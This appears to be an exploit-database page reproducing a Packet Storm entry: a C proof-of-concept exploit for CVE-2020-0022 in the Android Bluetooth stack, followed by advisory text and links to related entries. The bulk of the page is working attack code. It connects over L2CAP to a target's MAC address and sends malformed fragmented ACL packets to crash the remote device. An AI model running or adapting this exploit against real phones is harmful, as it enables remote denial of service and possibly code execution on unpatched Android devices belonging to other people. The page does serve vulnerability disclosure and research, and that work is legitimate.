Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:156891
HistoryMar 25, 2020 - 12:00 a.m.

Android Bluetooth Remote Denial Of Service

2020-03-2500:00:00
nu11secur1ty
packetstormsecurity.com
178
JSON
`# Exploit Title: Critical Bluetooth Vulnerability in Android (CVE-2020-0022) - Remote DoS  
# Author: nu11secur1ty  
# Date: 2020-03-24  
# Vendor: Android  
# Link:  
https://github.com/nu11secur1ty/Andr01dExploits/tree/master/CVE-2020-0022  
# CVE: CVE-2020-0022  
  
  
  
[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)  
[+] Website: https://www.nu11secur1ty.com/  
[+] Source: readme from GitHUB  
[+] twitter.com/nu11secur1ty  
  
  
[Exploit Program Code]  
  
/*  
* gcc -lbluetooth poc.c -o poc  
* sudo ./p0c_blue MAC_ADDR  
*/  
  
  
#include <stdio.h>  
#include <string.h>  
#include <stdlib.h>  
#include <sys/socket.h>  
#include <sys/select.h>  
#include <bluetooth/bluetooth.h>  
#include <bluetooth/l2cap.h>  
#include <bluetooth/hci.h>  
#include <bluetooth/hci_lib.h>  
#include <errno.h>  
#include <unistd.h>  
#include <sys/uio.h>  
  
  
int hci_send_acl_data(int hci_socket, uint16_t hci_handle, uint8_t *data,  
uint16_t data_length,uint16_t, uint16_t);  
  
int main(int argc,char **argv) {  
bdaddr_t dst_addr;  
if (argc != 2){  
printf("usage: ./p0c_blue MAC_ADDR\n");  
exit(1);  
}  
str2ba(argv[1], &dst_addr);  
struct hci_dev_info di;  
  
// Get HCI Socket  
printf("\nCreating HCI socket...\n");  
int hci_device_id = hci_get_route(NULL);  
int hci_socket = hci_open_dev(hci_device_id);  
if(hci_devinfo(hci_device_id,&di)< 0){  
perror("devinfo");  
exit(1);  
}  
uint16_t hci_handle;  
// -------- L2CAP Socket --------  
// local addr  
struct l2cap_conninfo l2_conninfo;  
int l2_sock;  
struct sockaddr_l2 laddr, raddr;  
laddr.l2_family = AF_BLUETOOTH;  
laddr.l2_bdaddr = di.bdaddr;  
laddr.l2_psm = htobs(0x1001);  
laddr.l2_cid = htobs(0x0040);  
  
// remote addr  
memset(&raddr, 0, sizeof(raddr));  
raddr.l2_family = AF_BLUETOOTH;  
raddr.l2_bdaddr = dst_addr;  
  
// create socket  
printf("\nCreating l2cap socket...\n");  
if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0){  
perror("create l2cap socket");  
exit(1);  
}  
// bind and connect  
bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr));  
if(connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr))<0){  
perror("connect");  
exit(1);  
}  
socklen_t l2_conninfolen = sizeof(l2_conninfo);  
getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &l2_conninfo,  
&l2_conninfolen);  
hci_handle = l2_conninfo.hci_handle;  
printf("fuck%d", hci_handle);  
  
// -------- L2CAP Socket --------  
  
// HCI Connect  
printf("\nCreating a HCI BLE connection...\n");  
printf("\nPrepare to send packet\n");  
uint16_t datalen = 33;  
uint16_t _bs_l2cap_len = htobs(datalen);  
uint16_t _bs_cid = htobs(0x0001);  
uint8_t packet[4 + datalen + 0x1000];  
memcpy(&packet[0],&_bs_l2cap_len,2);  
memcpy(&packet[2],&_bs_cid,2);  
memset(&packet[4], 0x99, datalen+0x1000);  
int fl = 36;  
int i =0 ;  
hci_send_acl_data(hci_socket, hci_handle, &packet[i] , fl,0x2, fl );  
i+=fl;  
printf("\nSent fisrt packet\n");  
hci_send_acl_data(hci_socket, hci_handle, &packet[i] , 300,0x1, 300);  
  
printf("\nClosing HCI socket...\n");  
close(hci_socket);  
printf("\nClosing l2cap socket...\n");  
close(l2_sock);  
return 0;  
}  
  
int hci_send_acl_data(int hci_socket, uint16_t hci_handle, uint8_t *data,  
uint16_t data_length, uint16_t PBflag, uint16_t dlen){  
uint8_t type = HCI_ACLDATA_PKT;  
uint16_t BCflag = 0x0000; // Broadcast flag  
//uint16_t PBflag = 0x0002; // Packet Boundary flag  
uint16_t flags = ((BCflag << 2) | PBflag) & 0x000F;  
hci_acl_hdr hd;  
hd.handle = htobs(acl_handle_pack(hci_handle, flags));  
//hd.dlen = (data_length);  
hd.dlen = dlen;  
struct iovec iv[3];  
int ivn = 3;  
  
iv[0].iov_base = &type; // Type of operation  
iv[0].iov_len = 1; // Size of ACL operation flag  
iv[1].iov_base = &hd; // Handle info + flags  
iv[1].iov_len = HCI_ACL_HDR_SIZE; // L2CAP header length + data  
length  
iv[2].iov_base = data; // L2CAP header + data  
iv[2].iov_len = (data_length); // L2CAP header length + data  
length  
  
while (writev(hci_socket, iv, ivn) < 0) {  
if (errno == EAGAIN || errno == EINTR)  
continue;  
perror("writev");  
return -1;  
}  
return 0;  
}  
  
  
[Video]  
https://www.youtube.com/watch?v=9C0bz-GiVUI  
  
  
[Vulnerability Type]  
Remote DoS  
  
  
[CVE Reference]  
In reassemble_and_dispatch of packet_fragmenter.cc, there is possible out  
of bounds write due to an incorrect bounds calculation.  
This could lead to remote code execution over Bluetooth with no additional  
execution privileges needed.  
User interaction is not needed for exploitation.Product: AndroidVersions:  
Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-143894715  
  
  
[Security Issue]  
The Android Security Bulletin contains details of security vulnerabilities  
affecting Android devices. Security patch levels of 2020-02-05 or later  
address all of these issues. To learn how to check a device's security  
patch level, see Check and update your Android version.  
Android partners are notified of all issues at least a month before  
publication. Source code patches for these issues have been released to the  
Android Open Source Project (AOSP) repository and linked from this  
bulletin. This bulletin also includes links to patches outside of AOSP.  
The most severe of these issues is a critical security vulnerability in the  
System component that could enable a remote attacker using a specially  
crafted transmission to execute arbitrary code within the context of a  
privileged process. The severity assessment is based on the effect that  
exploiting the vulnerability would possibly have on an affected device,  
assuming the platform and service mitigations are turned off for  
development purposes or if successfully bypassed.  
Refer to the Android and Google Play Protect mitigations section for  
details on the Android security platform protections and Google Play  
Protect, which improve the security of the Android platform.  
  
  
  
[Disclosure Timeline]  
Published February 3, 2020 | Updated February 5, 2020  
  
  
[+] Disclaimer  
Disclaimer: The entry creation date may reflect when the CVE ID was  
allocated or reserved,  
and does not necessarily indicate when this vulnerability was discovered,  
shared with the affected vendor, publicly disclosed, or updated in CVE.  
  
FIX:  
  
-  
-  
- Fix on OS 10  
  
  
CVE References Type Severity Updated  
AOSP versions  
-------------------------------------------------------------------------------------------------  
CVE-2020-0022 A-143894715 DoS Moderate 10  
  
  
-  
-  
- Table:  
  
https://source.android.com/security/bulletin/2020-02-01  
  
  
@nu11secur1ty  
`

Related

githubexploit 5
cve 1
prion 1
zdt 1
huawei 1
threatpost 2
githubexploit
githubexploit
Exploit for Out-of-bounds Write in Google Android
2020-02-12 22:00:35
Exploit for Out-of-bounds Write in Google Android
2020-02-15 16:55:44
Exploit for Out-of-bounds Write in Google Android
2020-07-01 00:23:33
cve
cve
CVE-2020-0022
2020-02-13 15:15:00
prion
prion
Out-of-bounds
2020-02-13 15:15:00
zdt
zdt
Android Bluetooth Remote Denial Of Service Exploit
2020-03-26 00:00:00
huawei
huawei
Security Advisory - Integer Overflow Vulnerability in Android affects Several Huawei Smartphones
2020-05-13 00:00:00
threatpost
threatpost
Critical Android Bluetooth Bug Enables RCE, No User Interaction Needed
2020-02-07 20:35:43
Two Critical Android Bugs Get Patched in February Update
2020-02-04 18:51:48
JSON
Related for PACKETSTORM:156891
githubexploit5cve1prion1zdt1huawei1threatpost2